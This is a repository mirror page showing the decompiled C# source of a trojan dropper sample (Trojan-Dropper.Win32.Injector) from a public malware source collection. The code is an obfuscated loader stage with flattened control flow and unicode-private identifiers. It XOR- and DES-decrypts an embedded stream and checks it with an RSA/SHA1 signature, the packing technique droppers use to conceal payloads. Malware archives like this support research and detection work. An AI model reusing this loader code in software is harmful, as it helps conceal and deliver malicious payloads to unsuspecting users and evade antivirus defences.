ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e/.cs

420 lines
10 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Feon, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: AF8034ED-5A2C-4122-9E1B-F560737FA983
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal sealed class \uE011
{
private const int \uE000 = 8;
private const int \uE001 = 20;
private const int \uE002 = 4;
private static byte[] \uE003 = new byte[4];
private static byte[] \uE004;
static \uE011()
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
\uE011.\uE004 = new byte[4];
num = 4;
continue;
case 1:
\uE011.\uE003[1] = \uE011.\uE004[1] = (byte) 83;
num = 3;
continue;
case 2:
\uE011.\uE004[3] = (byte) 50;
num = 6;
continue;
case 3:
\uE011.\uE003[2] = \uE011.\uE004[2] = (byte) 65;
num = 5;
continue;
case 4:
\uE011.\uE003[0] = \uE011.\uE004[0] = (byte) 82;
num = 1;
continue;
case 5:
\uE011.\uE003[3] = (byte) 49;
num = 2;
continue;
case 6:
goto label_9;
default:
goto label_2;
}
}
label_9:;
}
public static MemoryStream \uE000(Stream _param0)
{
BinaryReader binaryReader1 = new BinaryReader(_param0);
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if ((!flag1 ? 1 : 0) == 0)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
int num = 7;
int count2;
int count3;
bool flag2;
byte[] numArray;
byte[] buffer3;
bool flag3;
while (true)
{
switch (num)
{
case 0:
count2 = (int) binaryReader2.ReadByte();
num = 3;
continue;
case 1:
count3 = (int) binaryReader2.ReadByte();
num = 8;
continue;
case 2:
flag2 = binaryReader2.ReadBoolean();
num = 0;
continue;
case 3:
numArray = new byte[count2];
num = 4;
continue;
case 4:
if (flag2)
{
num = 10;
continue;
}
goto label_19;
case 5:
binaryReader2.Read(buffer3, 0, count3);
num = 6;
continue;
case 6:
cryptoServiceProvider1.IV = buffer3;
num = 2;
continue;
case 7:
binaryReader2.ReadString();
num = 9;
continue;
case 8:
buffer3 = new byte[count3];
num = 5;
continue;
case 9:
flag3 = binaryReader2.ReadBoolean();
num = 1;
continue;
case 10:
goto label_18;
default:
goto label_6;
}
}
label_18:
binaryReader2.Read(numArray, 0, count2);
label_19:
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] buffer4 = new byte[count4];
binaryReader2.Read(buffer4, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count2);
numArray[5] |= (byte) 128;
cryptoServiceProvider2 = new RSACryptoServiceProvider();
cryptoServiceProvider2.ImportParameters(\uE011.\uE003(publicKey));
}
cryptoServiceProvider1.Key = numArray;
MemoryStream memoryStream = new MemoryStream();
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
{
if (flag3)
\uE00F.\uE000((Stream) cryptoStream, (Stream) memoryStream);
else
\uE011.\uE002((Stream) cryptoStream, (Stream) memoryStream);
}
if (cryptoServiceProvider2 != null)
{
memoryStream.Position = 0L;
if (!\uE011.\uE005(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
throw new InvalidOperationException();
}
memoryStream.Position = 0L;
return memoryStream;
}
private static byte[] \uE001(byte[] _param0, int _param1, int _param2)
{
if ((_param0 == null ? 1 : 0) == 0)
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (_param0.Length < _param1 + _param2)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_6:
byte[] destinationArray = new byte[_param2];
Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
return destinationArray;
}
label_5:
return (byte[]) null;
}
private static void \uE002(Stream _param0, Stream _param1)
{
byte[] buffer = new byte[4096];
while (true)
{
int count = _param0.Read(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
_param1.Write(buffer, 0, count);
else
break;
}
}
private static RSAParameters \uE003(byte[] _param0)
{
bool flag = _param0.Length == 160;
if ((!flag ? 1 : 0) == 0 && !\uE011.\uE004(_param0, \uE011.\uE003, 20))
return new RSAParameters();
if (!flag && !\uE011.\uE004(_param0, \uE011.\uE004, 8))
return new RSAParameters();
RSAParameters rsaParameters = new RSAParameters();
int num1 = (flag ? 20 : 8) + 8;
int num2 = 4;
rsaParameters.Exponent = \uE011.\uE001(_param0, num1, num2);
Array.Reverse((Array) rsaParameters.Exponent);
int num3 = num1 + num2;
int num4 = 128;
rsaParameters.Modulus = \uE011.\uE001(_param0, num3, num4);
Array.Reverse((Array) rsaParameters.Modulus);
if (flag)
return rsaParameters;
int num5 = num3 + num4;
label_8:
int num6 = 14;
while (true)
{
switch (num6)
{
case 0:
rsaParameters.P = \uE011.\uE001(_param0, num5, num4);
num6 = 12;
continue;
case 1:
rsaParameters.DQ = \uE011.\uE001(_param0, num5, num4);
num6 = 6;
continue;
case 2:
num5 += num4;
num6 = 15;
continue;
case 3:
rsaParameters.D = \uE011.\uE001(_param0, num5, num4);
num6 = 10;
continue;
case 4:
num5 += num4;
num6 = 7;
continue;
case 5:
rsaParameters.InverseQ = \uE011.\uE001(_param0, num5, num4);
num6 = 9;
continue;
case 6:
Array.Reverse((Array) rsaParameters.DQ);
num6 = 2;
continue;
case 7:
num4 = 64;
num6 = 1;
continue;
case 8:
num4 = 64;
num6 = 17;
continue;
case 9:
Array.Reverse((Array) rsaParameters.InverseQ);
num6 = 13;
continue;
case 10:
Array.Reverse((Array) rsaParameters.D);
num6 = 23;
continue;
case 11:
Array.Reverse((Array) rsaParameters.DP);
num6 = 4;
continue;
case 12:
Array.Reverse((Array) rsaParameters.P);
num6 = 16;
continue;
case 13:
num5 += num4;
num6 = 19;
continue;
case 14:
num4 = 64;
num6 = 0;
continue;
case 15:
num4 = 64;
num6 = 5;
continue;
case 16:
num5 += num4;
num6 = 21;
continue;
case 17:
rsaParameters.DP = \uE011.\uE001(_param0, num5, num4);
num6 = 11;
continue;
case 18:
rsaParameters.Q = \uE011.\uE001(_param0, num5, num4);
num6 = 20;
continue;
case 19:
num4 = 128;
num6 = 3;
continue;
case 20:
Array.Reverse((Array) rsaParameters.Q);
num6 = 22;
continue;
case 21:
num4 = 64;
num6 = 18;
continue;
case 22:
num5 += num4;
num6 = 8;
continue;
case 23:
goto label_32;
default:
goto label_8;
}
}
label_32:
return rsaParameters;
}
private static bool \uE004(byte[] _param0, byte[] _param1, int _param2)
{
int index = 0;
if ((index == 0 ? 1 : 0) != 0)
goto label_7;
else
goto label_2;
label_1:
int num;
switch (num)
{
case 0:
goto label_3;
case 1:
return false;
}
label_2:
num = 0;
goto label_1;
label_3:
if ((int) _param0[index + _param2] != (int) _param1[index])
{
num = 1;
goto label_1;
}
else
++index;
label_7:
if (index >= _param1.Length)
return true;
goto label_3;
}
private static bool \uE005(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
{
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
int num = 0;
byte[] hash;
string name;
while (true)
{
switch (num)
{
case 0:
hash = cryptoServiceProvider.ComputeHash(_param1);
num = 3;
continue;
case 1:
name += (string) (object) 'A';
num = 4;
continue;
case 2:
name += (string) (object) 'H';
num = 1;
continue;
case 3:
name = new string('S', 1);
num = 2;
continue;
case 4:
name += (string) (object) '1';
num = 5;
continue;
case 5:
goto label_8;
default:
goto label_2;
}
}
label_8:
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID(name), _param2);
}
}
Reference in New Issue Copy Permalink